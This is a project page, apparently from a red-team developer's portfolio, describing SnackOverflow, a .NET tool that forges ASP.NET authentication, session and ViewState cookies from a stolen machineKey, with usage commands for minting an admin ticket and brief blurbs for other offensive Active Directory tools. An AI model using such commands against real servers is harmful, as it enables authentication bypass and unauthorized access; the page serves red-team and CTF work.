Skip to content
S scriptkittens

đŸȘ **SnackOverflow**

Because sometimes you just want to forge some cookies and watch the world burn.

View source

Yummy
 Gatos love cookies.

What SnackOverflow is

Disclaimer: This tool is for educational purposes only. Use it at your own risk. Don’t be a jerk and use it to exploit someone without their consent.

SnackOverflow is a .NET tool for when you’ve stolen someone’s machineKey and you’d like to make them regret their poor configuration choices.

It forges ASP.NET cookies but not just boring old .ASPXAUTH, also __VIEWSTATE, ASP.NET_SessionId, and maybe some other baked good you can dream up.

Basically, it’s the part of the red-team toolkit that says:

“What if I could bake trust instead of stealing it?”

How SnackOverflow works

SnackOverflow parses a web.config (or takes keys directly) and reproduces Microsoft’s Framework 2.0SP2-style Encrypt + HMAC process. No black magic, no dependencies, just crypto and sarcasm.

Under the hood it:

  1. Reads your machineKey values (from file or CLI args)
  2. Serializes a legit-looking Forms Auth ticket
  3. Encrypts + signs it using AES / DES / 3DES
  4. Prints you a shiny hex string you can drop into your requests

That’s it. No setup, no dependencies, no remorse.

Using SnackOverflow

SnackOverflow --config web.config --user admin --group Administrators

or if you already know the keys:

SnackOverflow \
  --decryptionkey A1B2C3... \
  --validationkey F1E2D3... \
  --user admin --group Administrators

Optional args let you override the encryption/validation algorithm, because sometimes Microsoft didn’t get the memo about consistency.

Output

Each run spits out multiple cookies, for your convenience:

  • Forms Authentication Cookie (.ASPXAUTH)
  • Session Cookie (ASP.NET_SessionId)
  • Custom Encrypted Cookie (because you can)
  • ViewState Cookie (__VIEWSTATE, but cooler)

If it fails, it tells you why
 usually in the tone of a disappointed cat.

Example

Creating Forms Authentication Cookie...
Using Decryption Type: AES256
Using Validation Type: HMACSHA256
Cookie Name: .ASPXAUTH
User: admin
Group: Administrators
Cookie Length: 512 chars

If you see “Error: something something key length,” that’s on you, not me.

Why?

Because sometimes you pop a web server, grab web.config, and realize the app does everything client-side. Because sometimes “machineKey reuse across all dev/test/prod” isn’t just bad, it’s free access. Because why should only the app get to bake cookies?

Credits

Born from an all-night CTF binge that felt mythic in scope where somehow .ASPXAUTH forging was on the checklist.

SnackOverflow is what happens when sleep deprivation, sarcasm, and ASP.NET meet.

Disclaimer

If you’re using this in prod, you’ve already lost. If you’re using this for education or CTFs, carry on, hero.

Don’t be evil. Don’t get sued. Do bake responsibly.

More projects

crawlofduty

2026

it recursively checks if you can write to shares. or yolo and get everything. that's it.

Go Smb Open Source

altered-state

2026

you broke the domain. altered-state doesn't care: snapshot, diff, fix, done. reset...reconfigure...replay!

Rust Active Directory LDAP Open Source

unPACman

2025

By the power of Certify and Rubeus, I have the power of unPACman! unPACman is a C# tool for AD CS environments that tries to unPAC yourself in case you land a shell and don't have credentials. Will try to find and use any template available to you.

C# .NET AD CS Kerberos
Let's talk

Have a project in mind?

Whether it's a new build or something that needs a fresh perspective — I'd love to hear about it.

Start a project All projects